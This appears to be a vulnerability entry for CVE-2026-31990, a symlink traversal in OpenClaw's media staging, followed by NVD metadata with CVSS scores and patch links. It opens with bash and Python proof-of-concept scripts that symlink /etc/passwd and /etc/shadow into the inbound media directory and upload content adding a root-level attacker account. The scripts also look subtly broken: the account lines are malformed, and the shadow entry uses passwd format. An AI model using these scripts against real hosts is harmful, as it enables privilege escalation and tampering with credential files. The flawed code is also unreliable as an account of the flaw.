CVE-2026-31990

#!/bin/bash # CVE-2026-31990 PoC - OpenClaw Symlink Traversal # Target: OpenClaw < 2026.3.2 TARGET_HOST="target-vulnerable-server" MEDIA_DIR="/opt/openclaw/media/inbound" # Create a symlink in the media inbound directory # This symlink points to a file outside the sandbox ln -sf /etc/passwd ${MEDIA_DIR}/malicious_link # Upload a file with content that will be written through the symlink # The file name must match the symlink name curl -X POST -d "attacker:0:0:::/bin/bash:/bin/sh" \ "http://${TARGET_HOST}/media/upload" \ -F "filename=malicious_link" echo "PoC executed. Check if /etc/passwd was modified." # Python PoC alternative '''python import requests import os target = "http://vulnerable-server:8080" media_dir = "/opt/openclaw/media/inbound" # Step 1: Create symlink pointing to system file symlink_path = os.path.join(media_dir, "config_override") os.symlink("/etc/shadow", symlink_path) # Step 2: Upload malicious content files = { 'file': ('config_override', b'root:attacker_hash:0:0:root:/root:/bin/bash\n') } response = requests.post(f"{target}/api/media/stage", files=files) print(f"Status: {response.status_code}") print("If successful, /etc/shadow has been modified") '''

{"cve": {"id": "CVE-2026-31990", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:03.647", "lastModified": "2026-03-19T19:16:08.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.2 contain a vulnerability in the stageSandboxMedia function in which it fails to validate destination symlinks during media staging, allowing writes to follow symlinks outside the sandbox workspace. Attackers can exploit this by placing symlinks in the media/inbound directory to overwrite arbitrary files on the host system outside sandbox boundaries."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad en la función stageSandboxMedia en la que no valida los enlaces simbólicos de destino durante la preparación de medios, permitiendo que las escrituras sigan enlaces simbólicos fuera del espacio de trabajo de la sandbox. Los atacantes pueden explotar esto colocando enlaces simbólicos en el directorio media/inbound para sobrescribir archivos arbitrarios en el sistema anfitrión fuera de los límites de la sandbox."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.2", "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}